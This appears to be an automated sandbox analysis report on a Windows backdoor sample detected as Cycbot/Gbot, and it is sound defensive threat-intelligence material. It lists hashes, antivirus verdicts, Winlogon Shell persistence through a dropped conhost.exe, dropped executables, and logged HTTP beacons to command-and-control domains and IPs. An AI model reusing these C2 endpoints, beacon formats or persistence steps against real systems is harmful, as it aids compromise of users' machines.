Analysis Date: 2014-11-04 07:43:29
MD5: aac3735132821fc53a31f3c01f4cae98
SHA1: 12099e8cc316d42221801e79b536fb6a1730a44a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: e13e054f581d225e28f93182a1b3d622 sha1: 5b29436466be2023186a5f332d4a84e4571904a7 size: 96768
Section: .rdata md5: c87c0ee3690048f7ab7ec14aa3d7ab78 sha1: 730812582bd7f1f548176863fbeafc04675673ea size: 1536
Section: .data md5: 9817fd5261d238eef76ada7db62d7ff0 sha1: b833713044fb4f9172d1011653d381544f5c3a56 size: 81408
Section: .reloc md5: b3e6c00940579f3a174abebec7792035 sha1: 2f7e0d3f236cf443822155efd85acf1a3df6da44 size: 1024
Timestamp: 2005-11-28 17:44:26
PEhash: 961ae48f98737d84e8c5b04e9a5b383400bcbea2
IMPhash: c0218d6cbe51d12b14c91cf7fec7295a
AV 360 Safe: Gen:Heur.Conjar.5
AV Ad-Aware: Gen:Heur.Conjar.5
AV Alwil (avast): Cybota [Trj]
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Goolbot.K.gen!Eldorado
AV Avira (antivir): TR/Crypt.ZPACK.Gen
AV BullGuard: Gen:Heur.Conjar.5
AV CA (E-Trust Ino): Win32/FraudSecurity.B!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Gbot-1493
AV Dr. Web: Trojan.DownLoader5.1690
AV Emsisoft: Gen:Heur.Conjar.5
AV Eset (nod32): Win32/Kryptik.TQJ
AV Fortinet: W32/Kryptik.ISS!tr
AV Frisk (f-prot): W32/Goolbot.K.gen!Eldorado
AV F-Secure: Gen:Heur.Conjar.5
AV Grisoft (avg): Win32/Cryptor
AV Ikarus: Backdoor.Win32.Gbot
AV K7: Backdoor ( 003210941 )
AV Kaspersky: Trojan.Win32.Generic
AV MalwareBytes: Backdoor.Bot
AV Mcafee: BackDoor-EXI.gen.u
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.5
AV Norman: Gen:Heur.Conjar.5
AV Rising: no_virus
AV Sophos: Mal/FakeAV-IS
AV Symantec: Backdoor.Cycbot!gen10
AV Trend Micro: BKDR_CYCBOT.SME3
AV VirusBlokAda (vba32): BScope.Cycbot.1213

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\conhost.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\conhost.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Process: C:\malware.exe startC:\Program Files\Internet Explorer\lvvm.exe%C:\Program Files\Internet Explorer
Creates Mutex: {45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex: {5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: 127.0.0.1
Winsock DNS: onlinefilepanel.com
Winsock DNS: onlinehelptoall.com
Winsock DNS: onlineinstitute.com

Process
↳ C:\malware.exe startC:\Program Files\Internet Explorer\lvvm.exe%C:\Program Files\Internet Explorer

Creates Process: C:\Program Files\Internet Explorer\lvvm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Network Details:

DNS: onlineinstitute.com
Type: A
67.227.195.200
DNS: zonedg.com
Type: A
141.8.225.80
DNS: onlinefilepanel.com
Type: A
DNS: onlinehelptoall.com
Type: A
HTTP GEThttp://onlineinstitute.com/g7/images/logo.jpg?v4=16&tq=gJ4WK%2FSUh7TFlUR8oY%2BQtMWTUj26kJH7yZJSP7qVybhqtUn5CGFATA%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqxSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqpSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSPT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8CiYvEaS%2FT%2Bsqti8RpL6fhSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP: 192.168.1.1:1031 ➝ 67.227.195.200:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1039 ➝ 141.8.225.80:80

Raw Pcap

Strings